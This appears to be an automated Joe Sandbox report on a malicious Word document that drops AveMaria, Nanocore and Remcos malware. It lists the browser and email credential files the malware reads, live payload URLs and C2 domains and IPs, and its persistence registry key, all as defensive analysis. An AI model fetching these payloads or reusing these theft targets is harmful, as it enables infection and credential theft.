        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: \Chromium\User Data\Default\Login Data
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: \Google\Chrome\User Data\Default\Login Data
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: \Chromium\User Data\Default\Login Data
        Contains functionality to steal e-mail passwordsShow sources
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: POP3 Password
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: SMTP Password
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: IMAP Password
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: POP3 Password
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: SMTP Password
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: IMAP Password
        Tries to harvest and steal browser information (history, passwords, etc)Show sources
        Source: C:\ProgramData\images.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\logins.json
        Source: C:\ProgramData\images.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\ProgramData\images.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
        Source: C:\ProgramData\images.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
        Source: C:\ProgramData\images.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
        Source: C:\ProgramData\images.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
        Source: Yara matchFile source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY

        Remote Access Functionality:

        barindex
        Yara detected AveMaria stealerShow sources
        Source: Yara matchFile source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.61381d.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\ProgramData\images.exeCode function: 21_3_04253030 sqlite3_clear_bindings,_memset,
        Source: C:\ProgramData\images.exeCode function: 21_3_042550E0 sqlite3_bind_parameter_index,
        Source: C:\ProgramData\images.exeCode function: 21_3_042552D0 sqlite3_transfer_bindings,
        Source: C:\ProgramData\images.exeCode function: 21_3_04254C20 sqlite3_bind_int,

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management Instrumentation1LSASS Driver2LSASS Driver2Disable or Modify Tools11OS Credential Dumping3System Time Discovery12Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer33Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationEndpoint Denial of Service1
        Default AccountsScripting2Create Account11Access Token Manipulation1Deobfuscate/Decode Files or Information1Input Capture121System Service Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsNative API1Windows Service11Windows Service11Scripting2Credentials In Files1File and Directory Discovery5SMB/Windows Admin SharesInput Capture121Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsShared Modules1Scheduled Task/Job1Process Injection622Obfuscated Files or Information4NTDSSystem Information Discovery27Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
        Cloud AccountsExploitation for Client Execution33Registry Run Keys / Startup Folder1Scheduled Task/Job1Software Packing3LSA SecretsSecurity Software Discovery331SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol122Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaCommand and Scripting Interpreter11Rc.commonRegistry Run Keys / Startup Folder1Masquerading23Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled Task/Job1Startup ItemsStartup ItemsModify Registry1DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseService Execution2Scheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion21Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShell3At (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection622Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronHidden Files and Directories1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
        Compromise Software Supply ChainUnix ShellLaunchdLaunchdHidden Users2KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 457815 Sample: NEW PO1100372954 -.doc Startdate: 02/08/2021 Architecture: WINDOWS Score: 100 98 hhjhtggfr.duckdns.org 2->98 120 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->120 122 Malicious sample detected (through community Yara rule) 2->122 124 Antivirus detection for URL or domain 2->124 126 22 other signatures 2->126 13 WINWORD.EXE 305 48 2->13         started        18 drvinst.exe 2->18         started        20 rdpdr.sys 2->20         started        22 3 other processes 2->22 signatures3 process4 dnsIp5 110 hhjhtggfr.duckdns.org 203.159.80.186, 49165, 49166, 49167 LOVESERVERSGB Netherlands 13->110 112 newhosteeeee.ydns.eu 13->112 90 C:\Users\user\AppData\Local\...\putty[1].exe, PE32 13->90 dropped 92 C:\Users\user\AppData\...\abdtfhghgdghgh .ScT, data 13->92 dropped 94 C:\Users\user\AppData\Local\...\FLD93F.tmp, 370 13->94 dropped 96 C:\Users\user\AppData\Local\...\11DB366A.png, 370 13->96 dropped 164 Document exploit detected (creates forbidden files) 13->164 166 Suspicious powershell command line found 13->166 168 Tries to download and execute files (via powershell) 13->168 170 2 other signatures 13->170 24 powershell.exe 7 13->24         started        28 powershell.exe 7 13->28         started        30 powershell.exe 12 7 13->30         started        33 3 other processes 13->33 file6 signatures7 process8 dnsIp9 106 newhosteeeee.ydns.eu 24->106 88 C:\Users\user\AppData\Roaming\putty.exe, PE32 24->88 dropped 35 putty.exe 1 7 24->35         started        38 putty.exe 2 28->38         started        108 newhosteeeee.ydns.eu 30->108 154 Powershell drops PE file 30->154 156 Injects files into Windows application 33->156 file10 signatures11 process12 signatures13 128 Multi AV Scanner detection for dropped file 35->128 130 Machine Learning detection for dropped file 35->130 132 Contains functionality to inject threads in other processes 35->132 136 2 other signatures 35->136 40 putty.exe 4 4 35->40         started        134 Injects a PE file into a foreign processes 38->134 44 putty.exe 38->44         started        46 putty.exe 38->46         started        48 putty.exe 38->48         started        process14 file15 78 C:\ProgramData\images.exe, PE32 40->78 dropped 140 Increases the number of concurrent connection per server for Internet Explorer 40->140 142 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->142 50 images.exe 40->50         started        53 cmd.exe 40->53         started        signatures16 process17 signatures18 114 Multi AV Scanner detection for dropped file 50->114 116 Machine Learning detection for dropped file 50->116 118 Injects a PE file into a foreign processes 50->118 55 images.exe 50->55         started        60 reg.exe 53->60         started        process19 dnsIp20 102 hutyrtit.ydns.eu 203.159.80.165, 49169, 80 LOVESERVERSGB Netherlands 55->102 104 sdafsdffssffs.ydns.eu 55->104 80 C:\Users\user\AppData\Roaming\iBCrDCK.i.exe, PE32 55->80 dropped 82 C:\Users\user\AppData\Local\...\microC[1].exe, PE32 55->82 dropped 84 C:\Program Files\Microsoft DN1\sqlmap.dll, PE32+ 55->84 dropped 86 C:\Windows\System32\rfxvmt.dll, PE32+ 55->86 dropped 144 Hides user accounts 55->144 146 Tries to harvest and steal browser information (history, passwords, etc) 55->146 148 Writes to foreign memory regions 55->148 152 3 other signatures 55->152 62 iBCrDCK.i.exe 55->62         started        65 cmd.exe 55->65         started        150 Creates an undocumented autostart registry key 60->150 file21 signatures22 process23 signatures24 158 Multi AV Scanner detection for dropped file 62->158 160 Machine Learning detection for dropped file 62->160 162 Injects a PE file into a foreign processes 62->162 67 iBCrDCK.i.exe 62->67         started        72 iBCrDCK.i.exe 62->72         started        process25 dnsIp26 100 hhjhtggfr.duckdns.org 67->100 74 C:\Program Files (x86)\...\smtpsvc.exe, PE32 67->74 dropped 76 C:\Users\user\AppData\Roaming\...\run.dat, International 67->76 dropped 138 Hides that the sample has been downloaded from the Internet (zone.identifier) 67->138 file27 signatures28

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        NEW PO1100372954 -.doc24%ReversingLabsScript.Exploit.CVE-2017-11882

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\iBCrDCK.i.exe100%Joe Sandbox ML
        C:\ProgramData\images.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\putty.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe100%Joe Sandbox ML
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe20%ReversingLabsByteCode-MSIL.Backdoor.Remcos
        C:\Program Files\Microsoft DN1\sqlmap.dll20%MetadefenderBrowse
        C:\Program Files\Microsoft DN1\sqlmap.dll43%ReversingLabsWin64.Trojan.RDPWrap
        C:\ProgramData\images.exe28%ReversingLabs
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe20%ReversingLabsByteCode-MSIL.Backdoor.Remcos
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe28%ReversingLabs
        C:\Users\user\AppData\Roaming\iBCrDCK.i.exe20%ReversingLabsByteCode-MSIL.Backdoor.Remcos
        C:\Users\user\AppData\Roaming\putty.exe28%ReversingLabs
        C:\Windows\System32\rfxvmt.dll0%MetadefenderBrowse
        C:\Windows\System32\rfxvmt.dll0%ReversingLabs

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        21.2.images.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
        15.2.putty.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.Gen2Download File
        34.2.iBCrDCK.i.exe.400000.2.unpack100%AviraTR/Dropper.GenDownload File
        34.2.iBCrDCK.i.exe.440000.4.unpack100%AviraTR/NanoCore.fadteDownload File
        13.2.putty.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.Gen2Download File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.icra.org/vocabulary/.0%URL Reputationsafe
        http://newhosteeeee.ydns.eu0%Avira URL Cloudsafe
        http://hutyrtit.ydns.eu/microC.exe100%Avira URL Cloudmalware
        httP://newhosteeeee.ydns.eu/putty.exePE0%Avira URL Cloudsafe
        httP://newhosteeeee.ydns.eu/putty.exe0%Avira URL Cloudsafe
        http://ja.com/0%Avira URL Cloudsafe
        http://java.co0%Avira URL Cloudsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
        httP://newhosteeeee.ydns.eu/p0%Avira URL Cloudsafe
        httP://newhosteeeee.ydns.eu/putt0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        newhosteeeee.ydns.eu
        		203.159.80.186
        		truefalse
          		high
          sdafsdffssffs.ydns.eu
          		203.159.80.186
          		truefalse
            		high
            hutyrtit.ydns.eu
            		203.159.80.165
            		truefalse
              		high
              hhjhtggfr.duckdns.org
              		203.159.80.186
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://hutyrtit.ydns.eu/microC.exetrue
                • Avira URL Cloud: malware
                		unknown
                http://newhosteeeee.ydns.eu/putty.exetrue
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checknotepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpfalse
                    		high
                    http://www.icra.org/vocabulary/.notepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000003.00000002.2095131637.0000000002310000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2099882416.0000000002420000.00000002.00000001.sdmpfalse
                      		high
                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000003.00000002.2094491159.00000000001CC000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpfalse
                        		high
                        http://newhosteeeee.ydns.eupowershell.exe, 00000003.00000002.2103127329.0000000003709000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2111053200.00000000036C9000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.piriform.com/ccleaner.powershell.exe, 00000003.00000002.2094474663.000000000019E000.00000004.00000020.sdmpfalse
                          		high
                          httP://newhosteeeee.ydns.eu/putty.exePEpowershell.exe, 00000003.00000002.2101696206.000000000360C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          httP://newhosteeeee.ydns.eu/putty.exepowershell.exe, 00000006.00000002.2096371882.000000000036E000.00000004.00000020.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://ja.com/powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://java.copowershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.piriform.com/ccleanerpowershell.exe, 00000003.00000002.2094491159.00000000001CC000.00000004.00000020.sdmp, powershell.exe, 00000006.00000002.2096271913.00000000002FE000.00000004.00000020.sdmpfalse
                            		high
                            http://www.%s.comPApowershell.exe, 00000003.00000002.2095131637.0000000002310000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2099882416.0000000002420000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		low
                            http://windowsmedia.com/redir/services.asp?WMPFriendly=truenotepad.exe, 00000016.00000002.2364183393.0000000003017000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://github.com/syohex/java-simple-mine-sweeperC:putty.exe, 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, putty.exe, 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmpfalse
                              		high
                              httP://newhosteeeee.ydns.eu/ppowershell.exe, 00000003.00000002.2103127329.0000000003709000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://github.com/syohex/java-simple-mine-sweeperputty.exe, images.exefalse
                                		high
                                httP://newhosteeeee.ydns.eu/puttpowershell.exe, 00000003.00000002.2101696206.000000000360C000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2109600442.00000000035CC000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                		unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                203.159.80.186
                                		newhosteeeee.ydns.euNetherlands
                                		47987LOVESERVERSGBfalse
                                203.159.80.165
                                		hutyrtit.ydns.euNetherlands
                                		47987LOVESERVERSGBfalse

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:457815
                                Start date:02.08.2021
                                Start time:10:59:02
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 14m 35s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:NEW PO1100372954 -.doc
                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                Number of analysed new started processes analysed:33
                                Number of new started drivers analysed:4
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.phis.troj.spyw.expl.evad.winDOC@45/31@24/2
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 50.5% (good quality ratio 49.5%)
                                • Quality average: 87.6%
                                • Quality standard deviation: 20.8%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .doc
                                • Found Word or Excel or PowerPoint or XPS Viewer
                                • Attach to Office via COM
                                • Active ActiveX Object
                                • Scroll down
                                • Close Viewer
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                • TCP Packets have been reduced to 100
                                • Not all processes where analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtCreateFile calls found.
                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                • Report size getting too big, too many NtEnumerateValueKey calls found.
                                • Report size getting too big, too many NtOpenFile calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/457815/sample/NEW PO1100372954 -.doc

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                10:59:41API Interceptor69x Sleep call for process: powershell.exe modified
                                10:59:50API Interceptor19x Sleep call for process: putty.exe modified
                                10:59:59API Interceptor1204x Sleep call for process: images.exe modified
                                11:00:13API Interceptor709x Sleep call for process: cmd.exe modified
                                11:00:16API Interceptor983x Sleep call for process: iBCrDCK.i.exe modified
                                11:00:23API Interceptor37x Sleep call for process: drvinst.exe modified
                                11:00:39AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run SMTP Service C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                11:00:49API Interceptor140x Sleep call for process: smtpsvc.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN

                                No context

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Program Files (x86)\SMTP Service\smtpsvc.exe
                                Process:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
